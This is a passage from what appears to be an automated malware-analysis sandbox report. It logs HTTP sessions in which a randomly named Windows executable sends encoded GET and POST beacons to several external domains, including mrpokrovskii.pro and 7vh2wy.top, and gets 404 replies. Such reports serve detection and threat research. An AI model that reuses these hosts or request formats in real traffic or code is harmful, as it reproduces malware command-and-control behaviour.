                                                                                  Data Ascii: 2J=vhbu6fAvexi0/7CHgv0+3F98lIwXauY1E73dnDuILje5BFNC5HwG+1ShtxQ3u2rltsr+0C5MjMXEWOy0Fl7NvbIlC0MP9eHeUwMELpc0TdaqDWlDVUy2iIFSMND8uSJKwBW7kdvAbUF7qhIjuCCf9iZOCy2qO7VNwOCoASKNyN/pu71b/GetbmbJcF6eTSw3wDBuq1hnOuJTo2klcjOPGhI1SXGODmFxhhMxpaMGHH7iVutMA/FFIEWX3Kc4fwHcl0jwWeyG6DwK8y0rTXcdSLZOXHikOcYgJc1mpDBByHFae2wGHg5+WsbDG4+rWtY2vOKO9oS2nlxE8446u+pEfCdx0ZzfNKqqsj54XyAUSx422nCdVD7VWlK0eSgH7hYW3bwSNW4i0hapNfZSpNNjygutKT/K1E6z5c05c3D43xS3WREH9vD6k+l4gPIsP3sqUD+YaHDINV9Hxggn8OjN5B9WN7MLeP1KpJmgGtq0/bHOmPhgLO4FDydNIotkI/o8f2yhiG2qIp5ncBX5SyvK9nfO5windru+US4EjSxnIJn+dbr+o/vOQfbXZVAdxAvYzHfgyNNl2dzIki8w0ijAcDIRgKvmtYDb5UB0iWMMagzaApxnDf8ixEEzAzoFgfU+9rRmvOY5YwCakZjIDAsZM0L3/qJ79I+Lbz0NV8nsFKU4pbOaJ/7vktoj5p1ylX9nomZrLRPgPoenIjlYzNqUzJ2Vd8TY6+hquwgMskftODCqS3Wn9q54JB3d2dNalyV1/w9GxNSg7hw76rL/H4xJZWjXpiMohv4/P+XmBApvYOFxcMDrjw7WKi76m5RtBKIpA50FvbSngkWD6mI+sAcnp21+fhsCUPoz275AWTBe+4/RKRGiWibhcANxoJzVNkboEz4KI+SkWoK8K2nfS3e1rDlSwWCs9fLcRHmUZnObT3G4PgPLI7apsQ3I3udIBMVQTbhzgXeUTRvR0bY+vIg68DYzVhc/3ycGBq72D/I/LViAHz3lY [TRUNCATED]
                                                                                  Nov 13, 2024 15:35:25.979759932 CET1159INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 13 Nov 2024 14:35:25 GMT
                                                                                  server: LiteSpeed
                                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-content-type-options: nosniff
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.55000268.66.226.92803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:27.893192053 CET438OUTGET /k81y/?2J=ijzO5vt4Wia988ezl94/5B5fhr01XtFEJs702F2lFCeAUQR2wSJY5h+0sGUliGD5vvb7tm1pzcvQX+qpOWiQ3K4hemU8wbaBHwJuA5BCX/yteUBDcWPxvtRpccaohSYfjw==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.717hy.net
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:28.520843983 CET1159INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 13 Nov 2024 14:35:28 GMT
                                                                                  server: LiteSpeed
                                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-content-type-options: nosniff
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.550003109.70.26.37803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:33.745203018 CET712OUTPOST /i6b4/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/i6b4/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 6d 5a 36 75 46 33 59 72 34 62 35 37 47 63 4d 35 54 2f 4d 41 4e 4e 2f 75 39 64 67 4b 51 72 42 44 79 59 73 50 73 4b 2b 55 51 42 36 61 79 45 67 66 31 69 64 4f 42 57 76 36 67 37 39 58 56 45 66 6a 73 6d 72 77 43 44 48 35 56 51 6d 46 76 46 35 36 72 46 6f 46 37 55 42 30 48 38 6f 58 75 77 56 70 69 78 32 4c 64 35 4d 4a 57 52 75 78 41 70 55 33 4f 67 32 57 70 4d 39 4b 4b 78 50 53 6b 35 72 36 75 66 2f 42 69 38 61 42 48 56 65 50 62 73 70 70 73 61 4f 52 30 6c 32 30 39 59 49 2f 45 6a 54 4e 53 31 4e 65 49 39 39 43 7a 61 45 48 51 4d 32 6e 48 76 67 41 4b 53 44 63 51 2f 32 6e 31 54 68 6d 33 6f 4a 41 6a 76 63 3d
                                                                                  Data Ascii: 2J=mZ6uF3Yr4b57GcM5T/MANN/u9dgKQrBDyYsPsK+UQB6ayEgf1idOBWv6g79XVEfjsmrwCDH5VQmFvF56rFoF7UB0H8oXuwVpix2Ld5MJWRuxApU3Og2WpM9KKxPSk5r6uf/Bi8aBHVePbsppsaOR0l209YI/EjTNS1NeI99CzaEHQM2nHvgAKSDcQ/2n1Thm3oJAjvc=
                                                                                  Nov 13, 2024 15:35:34.630711079 CET289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:34 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.550004109.70.26.37803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:36.283857107 CET732OUTPOST /i6b4/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/i6b4/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 6d 5a 36 75 46 33 59 72 34 62 35 37 45 38 63 35 49 65 4d 41 4c 74 2f 78 68 4e 67 4b 4c 37 42 48 79 59 6f 50 73 4f 75 45 52 79 65 61 79 68 63 66 6e 51 6c 4f 43 57 76 36 6f 62 39 57 62 6b 66 53 73 6d 32 50 43 47 2f 35 56 51 79 46 76 48 68 36 6f 30 6f 61 39 45 42 32 53 4d 6f 56 6a 51 56 70 69 78 32 4c 64 35 5a 73 57 58 47 78 44 59 45 33 49 42 32 58 33 63 39 4a 64 42 50 53 67 35 72 2b 75 66 2f 33 69 35 6e 6b 48 58 32 50 62 74 5a 70 74 4c 4f 51 74 56 32 49 7a 34 4a 54 43 32 32 67 4c 54 39 72 4b 63 30 63 6c 62 6c 35 63 61 48 4e 64 4e 6f 6f 5a 79 76 6b 41 73 2b 51 6b 6a 41 50 74 4c 5a 77 39 34 49 2b 2f 56 4f 6f 77 50 61 32 2f 67 44 58 6d 2b 61 34 49 33 4e 30
                                                                                  Data Ascii: 2J=mZ6uF3Yr4b57E8c5IeMALt/xhNgKL7BHyYoPsOuERyeayhcfnQlOCWv6ob9WbkfSsm2PCG/5VQyFvHh6o0oa9EB2SMoVjQVpix2Ld5ZsWXGxDYE3IB2X3c9JdBPSg5r+uf/3i5nkHX2PbtZptLOQtV2Iz4JTC22gLT9rKc0clbl5caHNdNooZyvkAs+QkjAPtLZw94I+/VOowPa2/gDXm+a4I3N0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.550005109.70.26.37803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:38.830744028 CET1749OUTPOST /i6b4/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/i6b4/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 6d 5a 36 75 46 33 59 72 34 62 35 37 45 38 63 35 49 65 4d 41 4c 74 2f 78 68 4e 67 4b 4c 37 42 48 79 59 6f 50 73 4f 75 45 52 79 57 61 31 58 6f 66 32 42 6c 4f 4e 32 76 36 72 62 39 54 62 6b 66 50 73 6d 2b 4c 43 48 44 44 56 54 4b 46 39 79 39 36 70 47 41 61 30 45 42 32 51 4d 6f 55 75 77 56 34 69 78 6d 51 64 35 4a 73 57 58 47 78 44 62 4d 33 66 41 32 58 77 73 39 4b 4b 78 50 6b 6b 35 72 61 75 66 6d 43 69 34 33 61 48 6d 57 50 62 4e 4a 70 67 5a 6d 51 79 6c 32 77 2b 59 4a 4c 43 32 79 6a 4c 54 4a 52 4b 63 41 36 6c 63 52 35 5a 62 6e 61 61 35 68 77 46 6b 6d 46 47 2f 43 54 32 6c 56 6f 73 4b 78 6f 30 50 38 32 2b 48 47 61 2b 62 6d 51 37 46 71 7a 30 4a 72 6f 50 7a 6b 49 66 2b 6f 75 47 2f 6b 51 63 54 41 4e 73 4c 48 72 6b 75 4c 50 78 78 38 34 34 45 37 7a 45 53 50 58 4c 62 54 6d 44 62 34 42 32 71 4e 70 32 4f 54 52 59 49 5a 4a 58 38 5a 57 2b 6a 64 31 34 66 7a 4b 41 7a 6b 59 49 66 72 4a 49 64 57 2f 55 6f 57 67 55 32 34 48 32 75 6c 6f 72 61 4a 67 4b 39 75 33 42 44 6f 47 46 35 6a 37 52 47 58 77 31 41 6e 5a 4b 6b 34 [TRUNCATED]
                                                                                  Data Ascii: 2J=mZ6uF3Yr4b57E8c5IeMALt/xhNgKL7BHyYoPsOuERyWa1Xof2BlON2v6rb9TbkfPsm+LCHDDVTKF9y96pGAa0EB2QMoUuwV4ixmQd5JsWXGxDbM3fA2Xws9KKxPkk5raufmCi43aHmWPbNJpgZmQyl2w+YJLC2yjLTJRKcA6lcR5Zbnaa5hwFkmFG/CT2lVosKxo0P82+HGa+bmQ7Fqz0JroPzkIf+ouG/kQcTANsLHrkuLPxx844E7zESPXLbTmDb4B2qNp2OTRYIZJX8ZW+jd14fzKAzkYIfrJIdW/UoWgU24H2uloraJgK9u3BDoGF5j7RGXw1AnZKk4UnbPErhpqT+qlItW1GXjOS5XIbVoF6a3AWMalW942op2z5bufIG4wBem8ZspRB6O5nxfXisDrD31xFBeo/WCUrIVpds8E7N266fVxVk9kZIVxDzErV+3Q0rkOOcHr8HGWf4F+M9uinP1/fKVLBNHttZ2QewVRwgboVWVUxlBTF8Oeq/ETFyiMp93t0ejLU3q0me7ELMaZuxzxA5WZznYSVJM+XdHL1KvCLjW++CoqDu8gsgP8eIQDgfj6LPCLOeeG3sYf0bkxQRhuxKcvftvL+ytuoWaOWIvsWL8fqDBC66IqG0zmNqYbPv2rRq4BvOdbuFBsw1fIRXiIP3NY/w7Ldu5b4dWAE1Yoa7fokCEdvDbNug82igC7eoPyR/mf1WEOcIF+ox5SAXKutShSNdEXXJO2D48z3nrWXITMkeqkaGWDGq179VsHB8WUZjiQNzJlpZrle01ZmlXl0WNwrc9b7GFSGQQKPeYC6q122Ij2R3ZdiDLeYiPgO+wfEoXue29SY51ve6GCVqUnmoSST7QfpNg8Dfpi4CoLQzqXENytqAqf10EgtpW/v0617UGssCYQOPAy1zavdOAU7ylSrtGLa6UWC73baHZjl2L4/c4agwxmQUwLXZiua+5QIh8ghG64rZ4VVp48lWtj3PuHJ+tvk42GqmA6FcIs6 [TRUNCATED]
                                                                                  Nov 13, 2024 15:35:39.705178022 CET289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.550006109.70.26.37803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:41.379340887 CET445OUTGET /i6b4/?2J=rbSOGHQf+oAIPcBZM/BWO4v0sc0ZI7pa6YU0oIiGfR+Ewkw1zlM3KmPagJJbTGfXhG2rczLZFwuqulMMl1sHkUxyatg9ogB88gOJZKl7SEK9bLYaCAnWqdxVYxi0oqyA/g==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:42.293850899 CET289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.55000720.2.249.7803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:50.194214106 CET694OUTPOST /ocnr/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.7vh2wy.top
                                                                                  Origin: http://www.7vh2wy.top
                                                                                  Referer: http://www.7vh2wy.top/ocnr/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 33 48 61 6a 34 61 68 34 6a 50 4f 43 69 38 30 58 39 54 62 68 2f 68 6a 41 43 71 74 55 76 32 54 30 32 59 6f 52 68 30 77 55 4c 66 79 53 33 46 70 6c 69 35 77 62 76 67 47 36 54 50 31 57 31 39 2b 72 68 5a 78 59 46 47 67 78 2b 6b 56 67 69 4c 6c 70 35 4b 55 77 72 51 65 6c 55 51 59 63 63 6c 4c 69 55 79 51 52 6a 30 42 6c 67 50 65 34 6f 35 7a 32 2f 76 32 57 4c 78 4a 6e 57 47 62 63 6b 74 68 74 78 73 72 71 46 6a 42 2b 6c 46 4a 52 6c 57 6a 6f 62 7a 78 64 4f 57 62 4f 79 72 79 73 6c 38 46 72 74 49 2b 56 70 79 33 7a 68 77 77 4e 55 6c 6f 36 57 72 4d 55 57 50 36 4c 59 75 38 2b 42 61 65 70 68 35 52 4a 49 58 51 3d
                                                                                  Data Ascii: 2J=3Haj4ah4jPOCi80X9Tbh/hjACqtUv2T02YoRh0wULfyS3Fpli5wbvgG6TP1W19+rhZxYFGgx+kVgiLlp5KUwrQelUQYcclLiUyQRj0BlgPe4o5z2/v2WLxJnWGbckthtxsrqFjB+lFJRlWjobzxdOWbOyrysl8FrtI+Vpy3zhwwNUlo6WrMUWP6LYu8+Baeph5RJIXQ=
                                                                                  Nov 13, 2024 15:35:51.152548075 CET289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:50 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.55000820.2.249.7803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:52.745970011 CET714OUTPOST /ocnr/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.7vh2wy.top
                                                                                  Origin: http://www.7vh2wy.top
                                                                                  Referer: http://www.7vh2wy.top/ocnr/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 33 48 61 6a 34 61 68 34 6a 50 4f 43 6b 59 49 58 34 78 7a 68 34 42 6a 44 48 71 74 55 32 6d 54 77 32 59 55 52 68 31 31 66 4c 73 57 53 33 6b 5a 6c 77 4c 59 62 71 67 47 36 62 76 31 66 34 64 2b 61 68 5a 4e 2b 46 46 34 78 2b 6e 70 67 69 4f 42 70 35 39 67 78 71 41 65 6e 5a 77 59 65 59 6c 4c 69 55 79 51 52 6a 31 68 50 67 50 57 34 6f 49 6a 32 74 61 57 5a 48 52 4a 67 65 6d 62 63 7a 39 68 70 78 73 71 51 46 69 64 51 6c 48 78 52 6c 54 66 6f 62 69 78 65 45 57 62 79 38 4c 79 39 68 75 77 59 74 35 75 4f 30 44 79 52 2f 52 30 65 59 7a 5a 51 4d 4a 45 38 46 76 57 7a 49 39 30 4a 51 71 2f 41 37 61 42 35 57 41 48 6e 77 64 4e 52 67 56 38 4e 4c 4e 4f 34 66 35 48 2f 77 36 61 43
                                                                                  Data Ascii: 2J=3Haj4ah4jPOCkYIX4xzh4BjDHqtU2mTw2YURh11fLsWS3kZlwLYbqgG6bv1f4d+ahZN+FF4x+npgiOBp59gxqAenZwYeYlLiUyQRj1hPgPW4oIj2taWZHRJgembcz9hpxsqQFidQlHxRlTfobixeEWby8Ly9huwYt5uO0DyR/R0eYzZQMJE8FvWzI90JQq/A7aB5WAHnwdNRgV8NLNO4f5H/w6aC
                                                                                  Nov 13, 2024 15:35:53.713681936 CET289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:53 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
